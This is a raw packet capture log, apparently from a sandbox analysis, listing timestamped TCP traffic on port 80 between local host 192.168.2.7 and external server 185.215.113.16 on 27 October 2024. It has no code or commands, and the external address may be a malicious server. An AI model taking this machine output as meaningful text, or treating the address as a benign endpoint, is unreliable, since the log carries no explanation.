                                                                                  Oct 27, 2024 08:52:26.525806904 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.525821924 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.525861025 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.683155060 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683204889 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683217049 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683264017 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.683286905 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683365107 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683372974 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.683377028 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683419943 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.683515072 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683584929 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683595896 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683634996 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.683670044 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.683725119 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.684112072 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.684189081 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.684201002 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.684245110 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.684269905 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.684333086 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.801549911 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801594019 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801606894 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801637888 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.801652908 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801666975 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801692963 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.801835060 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801846981 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801862955 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.801872015 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.801904917 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.802561998 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.802573919 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.802644014 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.802671909 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.802725077 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.802735090 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.802772045 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.845835924 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.845875978 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.845887899 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.845921993 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.892450094 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.920574903 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.920619011 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.920629978 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.920731068 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.920747995 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.920759916 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.920775890 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.920947075 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921003103 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921005011 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.921015024 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921053886 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.921119928 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921551943 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921561003 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921613932 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.921700954 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921741009 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.921765089 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.964287043 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.964328051 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.964339972 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.964375973 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:26.964407921 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:26.964417934 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.017558098 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.038960934 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.038989067 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039004087 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039037943 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.039163113 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039220095 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039233923 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039268017 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.039328098 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.039510965 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039581060 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039596081 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.039669991 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.082700014 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.082731009 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.082750082 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.082766056 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.082799911 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.082813025 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.082896948 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.082935095 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.082994938 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.083012104 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.083030939 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.083082914 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.083095074 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.126841068 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.157407999 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.157428026 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.157444954 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.157499075 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.157521963 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.157536983 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.157546997 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.157597065 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.157638073 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.157998085 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.158057928 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.158154011 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.171653032 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.171667099 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.171713114 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.200912952 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.200928926 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.200999975 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201037884 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.201086998 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201102972 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201172113 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201322079 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.201543093 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201592922 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201663017 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.201719046 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201807022 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.201874018 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.275825024 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.275861979 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.275876999 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.275918007 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.275926113 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.276051998 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.276052952 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.290062904 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.290086985 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.290096045 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.290208101 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.290245056 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.290280104 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.290297031 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.290415049 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.319685936 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.319730043 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.319747925 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.319813013 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.319823027 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.319976091 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.319986105 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.319977045 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.319977045 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.320051908 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.320061922 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.320116043 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.361327887 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.395566940 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.395586967 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.395607948 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.395821095 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.409662962 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.409689903 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.409701109 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.409739971 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.409760952 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.409769058 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.409785032 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.409804106 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.409835100 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.438081026 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438116074 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438127041 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438194990 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438251972 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438339949 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.438339949 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.438424110 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438425064 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.438477993 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438493967 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438565969 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.438623905 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.438690901 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.512862921 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.512901068 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.512911081 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.516248941 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.526901960 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.526928902 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.526937962 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.526947021 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.526995897 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.527020931 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.527029991 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.527067900 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.527147055 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.556577921 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556601048 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556611061 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556619883 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556642056 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.556694031 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556724072 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.556752920 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.556838989 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556900978 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.556909084 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.557013988 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.557023048 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.557033062 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.557179928 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.631268024 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.631293058 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.631308079 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.631375074 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.645245075 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.645287037 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.645294905 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.645332098 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.645421982 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.645462990 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.645474911 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.645483017 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.646326065 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.674993992 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675019026 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675043106 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675123930 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675132036 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.675132036 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.675133944 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675292015 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675424099 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675461054 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.675466061 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675477028 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675502062 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.675591946 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.675617933 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675626993 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.675683022 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.751113892 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.751123905 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.751138926 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.751924038 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.763734102 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.763814926 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.763829947 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.763838053 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.763916969 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.764013052 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.764036894 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.764125109 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.794601917 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.794616938 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.794626951 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.794635057 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.794730902 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.794822931 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.794867992 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795026064 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795039892 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795047045 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795114994 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.795430899 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795579910 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795593977 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795603037 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795618057 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.795638084 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.795666933 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.795939922 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.868222952 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.868236065 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.868273973 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.868280888 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.868362904 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.868362904 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.882472992 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.882483006 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.882498980 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.882669926 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.911638021 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.911658049 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.911719084 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.911792994 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.911807060 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.911817074 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.911890030 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.911926985 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.912327051 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912367105 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912374973 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912662029 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.912702084 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912733078 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912741899 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912890911 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.912899971 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.913135052 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.913532019 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.913559914 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.913566113 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.913681984 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:27.986742020 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.986908913 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.986918926 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:27.986970901 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:28.000785112 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.000847101 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.000874043 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.000880957 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.000916004 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:28.000956059 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:28.030358076 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.030401945 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.030411959 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.030430079 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:28.030462027 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:28.030504942 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.030514956 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.030567884 CET4976980192.168.2.7185.215.113.16
                                                                                  Oct 27, 2024 08:52:28.030591011 CET8049769185.215.113.16192.168.2.7
                                                                                  Oct 27, 2024 08:52:28.030673981 CET8049769185.215.113.16192.168.2.7
